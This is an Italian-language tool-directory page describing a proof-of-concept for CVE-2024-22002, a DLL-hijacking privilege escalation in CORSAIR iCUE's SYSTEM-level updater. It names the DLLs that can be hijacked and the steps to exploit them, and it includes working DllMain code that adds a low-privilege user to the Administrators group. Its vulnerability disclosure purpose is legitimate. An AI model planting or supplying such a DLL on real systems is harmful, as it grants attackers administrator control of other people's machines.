Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
iCUE_DllHijack_LPE-CVE-2024-22002 — Proof-of-concept per una vulnerabilità di escalation dei privilegi locali (CVE-2024-22002) in CORSAIR iCUE v5.9.105 tramite DLL hijacking durante il processo di aggiornamento, permettendo a utenti non privilegiati di ottenere privilegi SYSTEM. | Kitploit
Strumenti/GitHubGitHub/0xkickit/icue_dllhijack_lpe-cve-2024-22002
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHub0xkickit/icue_dllhijack_lpe-cve-2024-22002

iCUE_DllHijack_LPE-CVE-2024-22002

Proof-of-concept per una vulnerabilità di escalation dei privilegi locali (CVE-2024-22002) in CORSAIR iCUE v5.9.105 tramite DLL hijacking durante il processo di aggiornamento, permettendo a utenti non privilegiati di ottenere privilegi SYSTEM.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2 anni faNon ancora revisionato

Software vulnerabile e versione

  • Link per il download del software: CORSAIR iCUE v5.9.105 con iCUE Murals

Descrizione

È stata identificata una vulnerabilità di DLL Hijacking in iCUE v5.9.105. Questa vulnerabilità si verifica durante il processo di aggiornamento, gestito dal servizio "iCUEUpdateService". Il servizio avvia un processo ("cuepkg.exe") responsabile dell'esecuzione dell'aggiornamento, operando con privilegi "NT AUTHORITY\SYSTEM". Quando avvia il processo, cerca varie DLL nella directory \cuepkg-1.2.6, situata all'interno della directory di installazione di iCUE. Alcune di queste DLL non sono presenti per impostazione predefinita, ma poiché un utente normale ha i privilegi per creare file in quella directory, un aggressore potrebbe potenzialmente introdurre una DLL dannosa nella directory. Di conseguenza, questa DLL dannosa verrebbe caricata da cuepkg.exe con privilegi di Amministratore.

Le DLL rilevate affette sono le seguenti:

  • MSASN1.dll
  • NTASN1.dll
  • profapi.dll

Vettore CVSS: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

  • Punteggio Base: 7.8 (Alto)
  • Punteggio Temporale: 7.8 (Alto)
  • Punteggio Ambientale: 7.8 (Alto)

PoC

Come esempio, verrà presa la DLL profapi.dll.

  1. Creare la nostra DLL dannosa e aggiungerla alla directory %INSTALLDIR%cuepkg-1.2.6.
  2. Attendere che il programma si aggiorni automaticamente o, in questo caso, forzare l'aggiornamento facendo clic su "Verifica aggiornamenti".
  3. Il nostro utente senza privilegi di Amministratore viene aggiunto al gruppo.

Privilegi dell'utente lowpriv prima dell'esecuzione della DLL dannosa: lowpriv_cmd

Privilegi dell'utente lowpriv dopo l'esecuzione della DLL dannosa: lowpriv_cmd_adm

  • Esempio di codice dannoso:
root@kitploit:~
#include "pch.h"
#include <windows.h>
#include <cstdlib>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    {
        system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
    }
    break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}
Scarica lo strumento